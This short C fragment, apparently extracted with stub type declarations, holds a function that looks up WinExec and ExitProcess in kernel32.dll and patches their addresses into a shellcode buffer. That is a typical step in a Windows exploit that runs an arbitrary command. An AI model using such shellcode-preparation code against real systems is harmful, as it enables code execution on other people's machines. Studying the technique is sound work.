
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int HMODULE ;
typedef int DWORD ;


 int EncodeFuncAddr (char*,int,char*) ;
 int GetProcAddress (int ,char*) ;
 int LoadLibrary (char*) ;
 int fprintf (int ,char*,int,int) ;
 int stderr ;

int ModifyFuncAddr(char * shellcode)
{
 char * temp="0123456789ABCDEF";
 HMODULE hdl;
 unsigned char * p ;
 DWORD pAddr_WinExec ,pAddr_Exit ;

 hdl = LoadLibrary("kernel32.dll");
 pAddr_WinExec = GetProcAddress(hdl,"WinExec");
 pAddr_Exit = GetProcAddress(hdl,"ExitProcess");
 fprintf(stderr,"Find WinExec at Address %x, ExitProcess at Address %x\n",pAddr_WinExec,pAddr_Exit);
 EncodeFuncAddr(shellcode,pAddr_WinExec,"EXEC");
 EncodeFuncAddr(shellcode,pAddr_Exit,"EXIT");
}
